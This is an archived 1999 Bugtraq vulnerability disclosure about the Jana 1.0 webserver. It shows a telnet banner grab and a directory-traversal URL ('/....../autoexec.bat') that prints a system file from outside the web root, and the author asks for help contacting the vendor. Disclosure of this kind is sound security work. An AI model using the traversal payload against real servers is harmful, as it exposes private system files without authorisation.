Jana webserver exploit

[jason () SPIS NET (Jason Lutz)]

Bugtraq,

I have found a security flaw in Jana 1.0 webserver. I have not been able to find out any information on who makes this 
product nor a place to download the web server package. This webserver seems to be included as a suite of Internet 
services, one of witch I think is web-based chat. Enclosed is one exploit I have found in the limited time that I have 
had to deal with this web server. I am posting this information now so that one of you might know who makes this 
software and how I might be able to get in touch with them for further testing.

. 
[[root@foo whis]# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT
Server: Jana Server/1.40
Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
Content-Length: 38
Content-Type: text/html
Connection: close

<HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
[root@foo whis]#

http://server/....../autoexec.bat

Prints user's autoexec.bat


I would like to say thank you to rain.forest.puppy. for all his help.


Jason Lutz
Sprint Print Inc
jason () spis net